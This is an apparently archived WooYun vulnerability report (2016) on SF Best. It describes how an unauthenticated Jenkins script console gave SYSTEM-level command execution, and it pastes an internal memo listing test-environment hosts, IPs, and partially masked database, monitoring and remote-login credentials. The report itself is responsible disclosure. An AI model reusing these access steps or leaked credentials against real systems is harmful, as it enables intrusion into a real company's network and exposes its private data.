顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

2017年4月25日13:17:29评论292 views字数 261阅读0分52秒阅读模式

摘要

2016-03-04：细节已通知厂商并且等待厂商处理中
2016-03-04：厂商已经确认，细节仅向厂商公开
2016-03-14：细节向核心白帽子及相关领域专家公开
2016-03-24：细节向普通白帽子公开
2016-04-03：细节向实习白帽子公开
2016-04-18：细节向公众公开

漏洞概要关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-180875

漏洞标题：顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

漏洞作者： j14n

提交时间： 2016-03-04 17:20

公开时间： 2016-04-18 17:50

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行敏感接口未加权限认证安全意识不足安全意识不足

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

http://114.251.157.7/

先证明这个地址是顺丰优选的,

jenkins 未授权访问

code 区域

http://114.251.157.7:8080/

项目源码

命令执行

code 区域

http://114.251.157.7:8080/script

code 区域

cmd /c type d://跑测账号.txt

E：

这些就不进去一一截图了

nt authority/system权限

内网

最后发一下 t环境

code 区域

绑定host后， 新监控平台访问地址：
            http://10.102.36.157:8080/ServiceManagement/logout.do     
           （用户名 admi手工大码per     密码：123456789）
  
 远程访问IDC测试环境服务器（CRT创建新连接）：
 10.102.36.171  www.t.com
 10.102.36.161  scm.t.com
 10.102.36.162  win.t.com
 10.102.36.154  fms.t.com    （财务系统）
 端口号均为：9880  用户均为： ng手工大码x     密码均为： 1q手工大码4r
 
 各位，
          目前，IDC新测试环境各系统功能已经基本测试通过，
 现，告知IDC测试环境访问方式。
 1、  host绑定：
 10.102.36.171  www.t.com
 10.102.36.171  passport.t.com
 10.102.36.171  home.t.com
 10.102.36.171  cart.t.com
 10.102.36.171  i.t.com
 10.102.36.171  corp.t.com
 10.102.36.171  supplier.t.com
 10.102.36.170  search.t.com
  
 10.102.36.160  uas.t.com
 10.102.36.161  scm.t.com
 10.102.36.162  win.t.com
 10.102.36.157  ServiceManagement （监控平台）
 10.102.36.154  fms.t.com
 10.102.36.171  channel.t.com
          绑定host后，可通过原域名正常访问新测试环境。
  
 2、  数据库：
 新后台库：
 用户名：sf_de手工大码st
 密码：luxwH3手工大码tG
 项目名称:测试组
 数据库IP:10.102.36.132 域名:IDC-T-sfbest
  
 新前台库：
 用户名：sf_dev_test
 密码：L5U手工大码Sk7b
 项目名称:测试组
 数据库IP:10.102.36.135 域名:IDC-T-WebOrder
 
 
 新LSCM地址：http://lscm.st.sf-express.com:8080/lscm/loginmgmt/frame.action
 用户：315572 密码：ac手工大码.123
 
 wms远程链接：10.0.44.98
 账号及密码：6805手工大码0506
 
    目前仓储那边搭建了一个新的测试环境，地址与账户密码如下：
                 远程连接IP：10.202.34.159
                 用户名：315572/317750
                 密码：
            ps：以前申请的其他账号，请用以上密码登录。
 
                 lscm下发地址：http://lscm-cms.sit.sf-express.com/cms/newloginmgmt/navigation.action 
                 账户：234手工大码53
                 密码：ac手工大码.123

漏洞证明：

code 区域

http://114.251.157.7/

先证明这个地址是顺丰优选的,

jenkins 未授权访问

code 区域

http://114.251.157.7:8080/

项目源码

命令执行

code 区域

http://114.251.157.7:8080/script

code 区域

cmd /c type d://跑测账号.txt

E：

这些就不进去一一截图了

nt authority/system权限

内网

最后发一下 t环境

code 区域

绑定host后， 新监控平台访问地址：
            http://10.102.36.157:8080/ServiceManagement/logout.do     
           （用户名 admi手工大码per     密码：123456789）
  
 远程访问IDC测试环境服务器（CRT创建新连接）：
 10.102.36.171  www.t.com
 10.102.36.161  scm.t.com
 10.102.36.162  win.t.com
 10.102.36.154  fms.t.com    （财务系统）
 端口号均为：9880  用户均为： ng手工大码x     密码均为： 1q手工大码4r
 
 各位，
          目前，IDC新测试环境各系统功能已经基本测试通过，
 现，告知IDC测试环境访问方式。
 1、  host绑定：
 10.102.36.171  www.t.com
 10.102.36.171  passport.t.com
 10.102.36.171  home.t.com
 10.102.36.171  cart.t.com
 10.102.36.171  i.t.com
 10.102.36.171  corp.t.com
 10.102.36.171  supplier.t.com
 10.102.36.170  search.t.com
  
 10.102.36.160  uas.t.com
 10.102.36.161  scm.t.com
 10.102.36.162  win.t.com
 10.102.36.157  ServiceManagement （监控平台）
 10.102.36.154  fms.t.com
 10.102.36.171  channel.t.com
          绑定host后，可通过原域名正常访问新测试环境。
  
 2、  数据库：
 新后台库：
 用户名：sf_de手工大码st
 密码：luxwH3手工大码tG
 项目名称:测试组
 数据库IP:10.102.36.132 域名:IDC-T-sfbest
  
 新前台库：
 用户名：sf_dev_test
 密码：L5U手工大码Sk7b
 项目名称:测试组
 数据库IP:10.102.36.135 域名:IDC-T-WebOrder
 
 
 新LSCM地址：http://lscm.st.sf-express.com:8080/lscm/loginmgmt/frame.action
 用户：315572 密码：ac手工大码.123
 
 wms远程链接：10.0.44.98
 账号及密码：6805手工大码0506
 
    目前仓储那边搭建了一个新的测试环境，地址与账户密码如下：
                 远程连接IP：10.202.34.159
                 用户名：315572/317750
                 密码：
            ps：以前申请的其他账号，请用以上密码登录。
 
                 lscm下发地址：http://lscm-cms.sit.sf-express.com/cms/newloginmgmt/navigation.action 
                 账户：234手工大码53
                 密码：ac手工大码.123

修复方案：

不安全的Jenkins允许网络上的任何人以你的身份访问程序。考虑至少启用身份验证来阻止滥用。

版权声明：转载请注明来源 j14n@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-04 17:50

厂商回复：

感谢提交，在紧急处理中。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-04 17:22 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

1

666

1# 回复此人
2016-03-04 17:22 | 独臂刀王 ( 普通白帽子 | Rank:393 漏洞数:103 | 提交一个漏洞就可以买个柚子~~好爽~)

1

可以的表弟

2# 回复此人
2016-03-04 17:26 | j14n ( 普通白帽子 | Rank:2226 漏洞数:398 )

1

@独臂刀王键盘明天到。。顺丰给转到别地了。。

3# 回复此人
2016-03-07 17:15 | 顺丰优选(乌云厂商)

1

@j14n 请提供一下你的联系方式。我们准备给予奖励……

4# 回复此人
2016-03-11 17:36 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

1

jenkins?

5# 回复此人

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-180875

漏洞标题： 顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

相关厂商： 顺丰优选

漏洞作者： j14n

提交时间： 2016-03-04 17:20

公开时间： 2016-04-18 17:50

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 远程命令执行 敏感接口未加权限认证 安全意识不足 安全意识不足

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 j14n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(13) 关注此漏洞

漏洞标题：顺丰优选某系统未授权访问导致命令执行/多个项目源码泄露/多个系统账号密码泄露/可渗透内网T环境

相关厂商：顺丰优选

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：厂商已经确认

Tags标签：远程命令执行敏感接口未加权限认证安全意识不足安全意识不足

漏洞评价(共0人评价):

登陆后才能进行评分